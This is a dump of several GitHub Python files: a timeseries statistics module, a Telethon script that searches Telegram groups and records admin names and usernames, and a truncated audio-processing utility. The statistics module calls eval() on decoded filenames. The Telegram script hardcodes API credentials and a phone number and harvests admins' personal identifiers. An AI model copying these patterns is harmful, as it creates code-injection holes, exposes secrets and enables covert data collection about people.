"call"}, {"api_name": "transformations.UnitVector.transform", "line_number": 178, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.tensordot", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 225, "usage_type": "attribute"}, {"api_name": "helper.sqrt", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 231, "usage_type": "attribute"}, {"api_name": "helper.trigivenlengths", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 266, "usage_type": "call"}, {"api_name": "helper.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "helper.trigivenlengths", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 343, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 377, "usage_type": "call"}, {"api_name": 
"numpy.where", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 390, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 391, "usage_type": "call"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 395, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.testing.suppress_warnings", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 413, "usage_type": "attribute"}, {"api_name": "doctest.NORMALIZE_WHITESPACE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.ELLIPSIS", "line_number": 415, "usage_type": "attribute"}, {"api_name": "doctest.testmod", "line_number": 417, "usage_type": "call"}]} +{"seq_id": "14334605091", "text": "#!/usr/bin/python\n# pylint: disable=line-too-long\n\"\"\"\nmodule to work with TimeseriesArrayStatistics\n\nautomatically calculates all TimeseriesStats for every Timeseries in TimeseriesArray\nat initialization\n\"\"\"\nimport sys\nimport json\nimport base64\nimport os\nimport logging\n# own modules\nfrom TimeseriesStats import TimeseriesStats as TimeseriesStats\nfrom CustomExceptions import *\n\n#################### hack begin ##########################\n\"\"\"\nhack to mimic some python 2.x behaviour is string\nrepresentation of tuples\n\"\"\"\ndef _b64encode_p3(list_obj):\n if len(list_obj) == 1:\n start =\"(u'\" + list_obj[0] + \"',)\"\n else:\n start =\"(u'\" + \"', u'\".join((str(key) for key in list_obj)) + \"')\"\n encoded = base64.urlsafe_b64encode(start.encode(\"utf-8\")).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64encode_p2(list_obj):\n encoded = base64.urlsafe_b64encode(unicode(tuple(list_obj))).decode(\"utf-8\")\n #print(\"%s -> %s -> %s\" % (list_obj, encoded, b64decode(encoded)))\n return encoded\n\ndef _b64decode(encoded):\n decoded = base64.b64decode(encoded).decode(\"utf-8\")\n #print(\"%s -> %s\" % (encoded, decoded))\n return decoded\n\n\nif sys.version_info < (3,0):\n print(\"using python 2 coding funtions\")\n b64encode = _b64encode_p3\n b64decode = 
_b64decode\nelse:\n b64encode = _b64encode_p3\n b64decode = _b64decode\n##################### hack end ###########################\n\n\nclass TimeseriesArrayStats(object):\n \"\"\"\n hold dictionary of TimeseriesStats objects\n \"\"\"\n\n def __init__(self, tsa):\n \"\"\"\n creates TimeseriesStat objects for every key in given TimeseriesArray object\n index_keys and value_keys are used from given TimeseriesArray object\n\n parameters:\n tsa \n \"\"\"\n # define instance data\n self.__stats = {}\n self.__index_keynames = tuple(tsa.index_keynames)\n self.__value_keynames = tuple(tsa.value_keynames)\n for index_key in tsa.keys():\n try:\n self.__stats[index_key] = TimeseriesStats(tsa[index_key])\n except TimeseriesEmptyError as exc:\n logging.info(\"Timeseries for key %s is length zero, skipping\", index_key)\n\n def __str__(self):\n return json.dumps(self.to_data(), indent=4, sort_keys=True)\n\n to_json = __str__\n\n def __eq__(self, other):\n try:\n assert self.__index_keynames == other.index_keynames\n assert self.__value_keynames == other.value_keynames\n assert len(self.__stats.keys()) == len(other.stats.keys())\n for key in self.__stats.keys():\n assert self.__stats[key] == other.stats[key]\n except AssertionError as exc:\n logging.exception(exc)\n return False\n return True\n\n def __len__(self):\n return len(self.__stats.keys())\n\n def __getitem__(self, key):\n return self.__stats[key]\n\n def __delitem__(self, key):\n del self.__stats[key]\n\n def keys(self):\n return self.__stats.keys()\n\n def values(self):\n return self.__stats.values()\n\n def items(self):\n return self.__stats.items()\n\n @property\n def stats(self):\n return self.__stats\n\n @stats.setter\n def stats(self, value):\n self.__stats = value\n\n @property\n def index_keynames(self):\n return self.__index_keynames\n\n @index_keynames.setter\n def index_keynames(self, value):\n self.__index_keynames = value\n\n @property\n def value_keynames(self):\n return self.__value_keynames\n\n @value_keynames.setter\n def value_keynames(self, value):\n self.__value_keynames = value\n\n def slice(self, value_keys):\n \"\"\"\n remove all values_keys not in value_keys, and return new TimeseriesArrayStats object\n \"\"\"\n assert all((value_key in self.__value_keynames for value_key in value_keys))\n outdata = []\n outdata.append(self.__index_keynames)\n outdata.append(value_keys)\n tsstat_data = []\n for key, tsstat in self.__stats.items():\n data = {}\n for value_key in value_keys:\n data[value_key] = tsstat[value_key]\n tsstat_data.append((key, json.dumps(data)))\n outdata.append(tsstat_data)\n new_tsastat = TimeseriesArrayStats.from_json(json.dumps(outdata))\n return new_tsastat\n\n def get_stats(self, value_key, stat_func_name=None):\n \"\"\"\n returns dictionary of stats of every Timeseries object in Array for this\n specific value_key only\n\n parameters:\n value_key must be in self.value_keys\n stat_func_name must be in self.stat_func_names or None\n\n returns:\n \n \"\"\"\n assert value_key in self.__value_keynames\n if stat_func_name is not None:\n assert stat_func_name in TimeseriesStats.get_stat_func_names()\n ret_data = {}\n for key, t_stat in self.__stats.items():\n if stat_func_name is not None:\n ret_data[key] = t_stat.stats[value_key][stat_func_name]\n else:\n ret_data[key] = t_stat.stats[value_key]\n return ret_data\n\n @staticmethod\n def _get_tsstat_dumpfilename(key):\n \"\"\"\n create filename for stored or to be stored TimeseriesStats objects\n from given key\n key will be base64 encoded\n\n parameters:\n key 
\n\n returns:\n \n \"\"\"\n return \"tsstat_%s.json\" % b64encode(key)\n\n @staticmethod\n def get_dumpfilename(index_keys):\n \"\"\"\n create filename for stored or to be stored TimeseriesArrayStats\n from given index_keys\n index_keys will be base64 encoded\n\n parameters:\n index_keys \n\n returns:\n \n \"\"\"\n return \"tsastat_%s.json\" % b64encode(index_keys)\n\n def dump(self, outpath, overwrite=False):\n \"\"\"\n dump internal data to json file\n the filename is automatically created from index_keys\n\n parameters:\n outpath path wehere json file will be placed\n overwrite wheter or not a existing file should be overwritten\n \"\"\"\n #logging.info(\"index_keys: %s\", self.__index_keynames)\n outfilename = os.path.join(outpath, self.get_dumpfilename(self.__index_keynames))\n outdata = {\n \"index_keys\" : self.__index_keynames,\n \"value_keys\" : self.__value_keynames,\n \"tsstat_filenames\" : []\n }\n for key, tsstats in self.__stats.items():\n filename = self._get_tsstat_dumpfilename(key)\n fullfilename = os.path.join(outpath, filename)\n if (not os.path.isfile(fullfilename)) or (overwrite is True):\n with open(fullfilename, \"wt\") as outfile:\n tsstats.dump(outfile)\n outdata[\"tsstat_filenames\"].append(filename)\n with open(outfilename, \"wt\") as outfile:\n json.dump(outdata, outfile)\n\n @staticmethod\n def _filtermatch(key_dict, filterkeys, matchtype):\n \"\"\"\n key_dict is the whole index key, aka\n {hostname : test, instance:1, other:2}\n\n filterkey is part\n {hostname : test}\n \"\"\"\n assert matchtype in (\"and\", \"or\")\n matched = 0\n for key in filterkeys.keys():\n if key_dict[key] == filterkeys[key]:\n matched += 1\n # every key must match at AND\n if (matchtype == \"and\") and (matched == len(filterkeys.keys())):\n return True\n # at least one key must match at OR\n elif (matchtype == \"or\") and (matched > 0):\n return True\n return False\n\n @staticmethod\n def _get_load_filenames(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n filterkeys could be a part of existing index_keys\n all matching keys will be used\n \"\"\"\n tsastat_filename = TimeseriesArrayStats.get_dumpfilename(index_keys)\n logging.debug(\"tsastat_filename: %s\", tsastat_filename)\n with open(os.path.join(path, tsastat_filename), \"rt\") as infile:\n data = json.load(infile)\n logging.debug(\"loaded json data\")\n logging.debug(\"index_keys: %s\", data[\"index_keys\"])\n logging.debug(\"value_keys: %s\", data[\"value_keys\"])\n logging.debug(\"number of ts files: %s\", len(data[\"tsstat_filenames\"]))\n filenames = {}\n for filename in data[\"tsstat_filenames\"]:\n logging.debug(\"reading key for tsstat from file %s\", filename)\n enc_key = filename.split(\".\")[0][7:] # only this pattern tsstat_(.*).json\n key = eval(b64decode(str(enc_key))) # must be str not unicode\n key_dict = dict(zip(index_keys, key))\n if filterkeys is not None:\n if TimeseriesArrayStats._filtermatch(key_dict, filterkeys, matchtype):\n logging.debug(\"adding tsastat key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n else:\n # no filterkeys means every file is added\n logging.debug(\"adding tsa key : %s\", key)\n filenames[key] = os.path.join(path, filename)\n return filenames\n\n @staticmethod\n def load(path, index_keys, filterkeys=None, matchtype=\"and\"):\n \"\"\"\n load stored json file (with dump() created) and return TimeseriesArrayStats object\n\n parameters:\n path path to search for stored json file, the filename is automatically created from given index_keys\n index_keys list 
of index_keys\n\n returns:\n \n \"\"\"\n #logging.info(\"index_keys: %s\", index_keys)\n infilename = os.path.join(path, TimeseriesArrayStats.get_dumpfilename(index_keys))\n try:\n fh = open(infilename, \"rb\")\n indata = json.load(fh)\n except Exception as exc:\n logging.exception(exc)\n logging.error(\"something went wrong while loading %s\", infilename)\n raise exc\n #logging.info(\"loaded JSON data: %s\", indata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[\"index_keys\"])\n tsastats.__value_keynames = tuple(indata[\"value_keys\"])\n tsastats.__stats = {}\n #for filename in indata[\"tsstat_filenames\"]:\n for key, filename in tsastats._get_load_filenames(path, index_keys, filterkeys, matchtype).items():\n #logging.info(\"loading TimeseriesStats object from %s\", fullfilename)\n with open(filename, \"rt\") as infile:\n tsastats.__stats[key] = TimeseriesStats.load(infile)\n return tsastats\n\n def to_data(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = {\n \"index_keynames\" : self.__index_keynames,\n \"value_keynames\" : self.__value_keynames,\n \"tsstats_filenames\" : [self._get_tsstat_dumpfilename(key) for key in self.__stats.keys()],\n \"tsastats_filename\" : self.get_dumpfilename(self.__index_keynames)\n }\n return ret_data\n\n def to_json(self):\n \"\"\"\n full data will be 3 dimensional, so this method returns only structure,\n use get_stats to get 2-dimensional data of specific value_keyname\n \"\"\"\n ret_data = [\n self.__index_keynames,\n self.__value_keynames,\n [(key, timeseries.stats) for key, timeseries in self.__stats.items()]\n ]\n return json.dumps(ret_data)\n\n @staticmethod\n def from_json(jsondata):\n indata = json.loads(jsondata)\n tsastats = TimeseriesArrayStats.__new__(TimeseriesArrayStats)\n tsastats.__index_keynames = tuple(indata[0])\n tsastats.__value_keynames = tuple(indata[1])\n tsastats.__stats = {}\n for key, tsstats in indata[2]:\n # from json there are only list, but these are not hashable,\n # so convert key to tuple\n tsastats.__stats[tuple(key)] = TimeseriesStats.from_json(json.dumps(tsstats))\n return tsastats\n\n def to_csv(self, stat_func_name, sortkey=None, reverse=True):\n \"\"\"\n return csv table of data for one specific statistical function\n\n first column is always the identifying key of this TimseriesStat as string\n mainly to use in websites to get easier to the key of this row\n \"\"\"\n yield (\"#key\", ) + self.__index_keynames + self.__value_keynames\n data = None\n if sortkey is not None:\n data = sorted(self.__stats.items(), key=lambda item: item[1][sortkey][stat_func_name], reverse=True)\n else:\n data = self.__stats.items()\n for key, value in data:\n values = list(key) + [value[value_key][stat_func_name] for value_key in self.__value_keynames]\n yield (str(key), ) + tuple(values)\n", "repo_name": "gunny26/datalogger", "sub_path": "datalogger/TimeseriesArrayStats.py", "file_name": "TimeseriesArrayStats.py", "file_ext": "py", "file_size_in_byte": 13175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 33, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.version_info", 
"line_number": 43, "usage_type": "attribute"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 148, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 150, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.get_stat_func_names", "line_number": 167, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 265, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 266, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path", "line_number": 277, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 303, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.load", "line_number": 314, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 314, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 340, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 344, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats.from_json", "line_number": 352, "usage_type": "call"}, {"api_name": "TimeseriesStats.TimeseriesStats", "line_number": 352, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}]} +{"seq_id": "1117537674", "text": "from telethon.sync import TelegramClient, events\nfrom telethon.tl.types import ChannelParticipantsAdmins\nfrom telethon import functions\nfrom time import sleep\nfrom random import randint\nimport pathlib\nfrom telethon.tl.types import ChannelParticipantsAdmins\n\n# Clients 
data\napi_id = 1454150\napi_hash = \"6bb467eaad074e28b7bfec3ad1a75d83\"\n\n# enter phone number as a session name\nsession_name = \"37255937683.session\"\n\nsearch_keyword_file = 'lists/search_keywords.txt'\n\n# True = for only groups\n# False = for groups and channels\nsearch_only_groups = True\n\noutput_file_name = 'lists/search_results_output.csv'\n\nprint(\"[+] Script started\")\n\ntry:\n keyword_list = []\n with open(search_keyword_file) as fp:\n temp_list = fp.read().strip().split(\"\\n\")\n for i in temp_list:\n if not i.strip() == '':\n keyword_list.append(i.strip())\n print(f\"[+] Sucessfully got keywords from '{search_keyword_file}'\")\nexcept Exception as e:\n print(f\"[-] Error Occured while reading '{search_keyword_file}'\")\n print(f\"[-] Error : {e}\")\n exit()\n\ndef add_data_to_output_file(keyword, data):\n if not pathlib.Path(output_file_name).exists():\n with open(output_file_name, 'w') as fw:\n fw.write(\"Keyword,Type,Title,Username,Participants,Admins\")\n new_data = ''\n for i in data:\n new_data += f'\\n{keyword},{i}'\n with open(output_file_name, 'a') as fw:\n fw.write(new_data)\n\n# add_data_to_output_file(keyword_list)\n# exit()\n\n# logining to phone\nclient = TelegramClient(session_name, api_id, api_hash).start(phone=session_name)\nif not client.is_user_authorized():\n print(\"\\n[-] Error occured while signing in, delete session file and try again.\")\n exit()\n\nprint(\"[+] Sucessfully logged in\\n\")\nprint(f\"[+] Total keywords found in file : {len(keyword_list)}\\n\")\n\n\n\nasync def main():\n for index, keyword in enumerate(keyword_list):\n print(f\"[{index+1}] {keyword}\")\n result = await client(functions.contacts.SearchRequest(\n q=keyword,\n limit=100\n ))\n # print(result.stringify())\n data = []\n for i in result.chats:\n if i.megagroup:\n chat_type = \"group\"\n chat_admins = \"\"\n try:\n async for user in client.iter_participants(i.username, filter=ChannelParticipantsAdmins):\n if not user.bot:\n if chat_admins:\n chat_admins += f\"|{user.first_name}({user.username})\"\n else:\n chat_admins = f\"{user.first_name}({user.username})\"\n except:\n chat_admins = \"None\"\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n else:\n chat_type = \"channel\"\n chat_admins = \"None\"\n if not search_only_groups:\n data.append(f\"{chat_type},{i.title},{i.username},{i.participants_count},{chat_admins}\")\n add_data_to_output_file(keyword, data)\n sleep(randint(1,3))\n print(\"\\n[+] All keyword done, terminating script\")\n\nclient.loop.run_until_complete(main())", "repo_name": "JacobZoarets/tgAdminCode", "sub_path": "12.search_groups_channels.py", "file_name": "12.search_groups_channels.py", "file_ext": "py", "file_size_in_byte": 3242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "telethon.sync.TelegramClient", "line_number": 53, "usage_type": "call"}, {"api_name": "telethon.functions.contacts.SearchRequest", "line_number": 66, "usage_type": "call"}, {"api_name": "telethon.functions.contacts", "line_number": 66, "usage_type": "attribute"}, {"api_name": "telethon.functions", "line_number": 66, "usage_type": "name"}, {"api_name": "telethon.tl.types.ChannelParticipantsAdmins", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}]} 
+{"seq_id": "33911825218", "text": "import os\nimport numpy as np\nimport matplotlib\nimport nlpaug.augmenter.audio as naa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport librosa.filters\nimport multiprocessing\nimport soundfile as sf\n\ntry:\n from constants import model_params, base_data_path\n from constants import *\nexcept ModuleNotFoundError:\n from .constants import model_params, base_data_path\n from .constants import *\n\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom skopt import gp_minimize\nfrom skopt.space import Real\nfrom functools import partial\nfrom pydub import AudioSegment\n# from keras.utils import multi_gpu_model\n\n# Set a random seed for numpy for reproducibility\nnp.random.seed(42)\n\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. Using non-interactive Agg backend')\n matplotlib.use('Agg')\n\ntry:\n import foundations\nexcept Exception as e:\n print(e)\n\n\ndef load_wav(path, sr):\n return librosa.core.load(path, sr=sr)[0]\n\n\ndef save_wav(wav, path, sr):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n # proposed by @dsmiller\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef save_wavenet_wav(wav, path, sr, inv_preemphasize, k):\n # wav = inv_preemphasis(wav, k, inv_preemphasize)\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, sr, wav.astype(np.int16))\n\n\ndef preemphasis(wav, k, preemphasize=True):\n if preemphasize:\n return signal.lfilter([1, -k], [1], wav)\n return wav\n\n\ndef inv_preemphasis(wav, k, inv_preemphasize=True):\n if inv_preemphasize:\n return signal.lfilter([1], [1, -k], wav)\n return wav\n\n\n# From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py\ndef start_and_end_indices(quantized, silence_threshold=2):\n assert quantized.size > 0\n start, end = 0, quantized.size - 1\n\n for start in range(quantized.size):\n if abs(quantized[start] - 127) > silence_threshold:\n break\n\n for end in range(quantized.size - 1, 1, -1):\n if abs(quantized[end] - 127) > silence_threshold:\n break\n\n assert abs(quantized[start] - 127) > silence_threshold\n assert abs(quantized[end] - 127) > silence_threshold\n\n return start, end\n\n\ndef trim_silence(wav, hparams):\n \"\"\"\n Trim leading and trailing silence\n Useful for M-AILABS dataset if we choose to trim\n the extra 0.5 silence at beginning and end.\n\n Thanks @begeekmyfriend and @lautjy for pointing out\n the params contradiction. 
These params are separate\n and tunable per dataset.\n \"\"\"\n return librosa.effects.trim(\n wav, top_db=hparams.trim_top_db,\n frame_length=hparams.trim_fft_size,\n hop_length=hparams.trim_hop_size\n )[0]\n\n\ndef get_hop_size(hparams):\n hop_size = hparams.hop_size\n if hop_size is None:\n assert hparams.frame_shift_ms is not None\n hop_size = int(\n hparams.frame_shift_ms / 1000 * hparams.sample_rate\n )\n return hop_size\n\n\ndef linearspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = (\n _amp_to_db(np.abs(D) ** hparams.magnitude_power, hparams) -\n hparams.ref_level_db\n )\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n return S\n\n\ndef melspectrogram(wav, hparams):\n D = _stft(wav, hparams)\n S = _amp_to_db(_linear_to_mel(\n np.abs(D) ** hparams.magnitude_power, hparams\n ), hparams) - hparams.ref_level_db\n\n if hparams.signal_normalization:\n return _normalize(S, hparams)\n\n return S\n\n\ndef inv_linear_spectrogram(linear_spectrogram, hparams):\n \"\"\"\n Converts linear spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(linear_spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n # Convert back to linear\n S = (\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power)\n )\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\ndef inv_mel_spectrogram(mel_spectrogram, hparams):\n \"\"\"\n Converts mel spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = _mel_to_linear(\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power),\n hparams\n ) # Convert back to linear\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\n# tensorflow Griffin-Lim\n# Thanks to @begeekmyfriend:\n# https://github.com/begeekmyfriend/Tacotron-2/blob/\n# mandarin-new/datasets/audio.py\n\ndef inv_linear_spectrogram_tensorflow(spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert spectrogram\n to waveform using TensorFlow.\n Unlike inv_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef inv_mel_spectrogram_tensorflow(mel_spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert mel spectrogram\n to waveform using TensorFlow.\n Unlike inv_mel_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if 
hparams.signal_normalization:\n D = _denormalize_tensorflow(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n # Convert back to linear\n S = _mel_to_linear_tensorflow(S, hparams)\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef _lws_processor(hparams):\n import lws\n return lws.lws(\n hparams.n_fft, get_hop_size(hparams),\n fftsize=hparams.win_size, mode=\"speech\"\n )\n\ndef _griffin_lim(S, hparams):\n \"\"\"\n liberos implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles, hparams)\n\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y, hparams)))\n y = _istft(S_complex * angles, hparams)\n\n return y\n\n\ndef _griffin_lim_tensorflow(S, hparams):\n \"\"\"\n TensorFlow implementation of Griffin-Lim\n Based on https://github.com/Kyubyong/tensorflow-exercises\n /blob/master/Audio_Processing.ipynb\n \"\"\"\n\n with tf.variable_scope('griffinlim'):\n # TensorFlow's stft and istft operate on a\n # batch of spectrograms; create batch of size 1\n S = 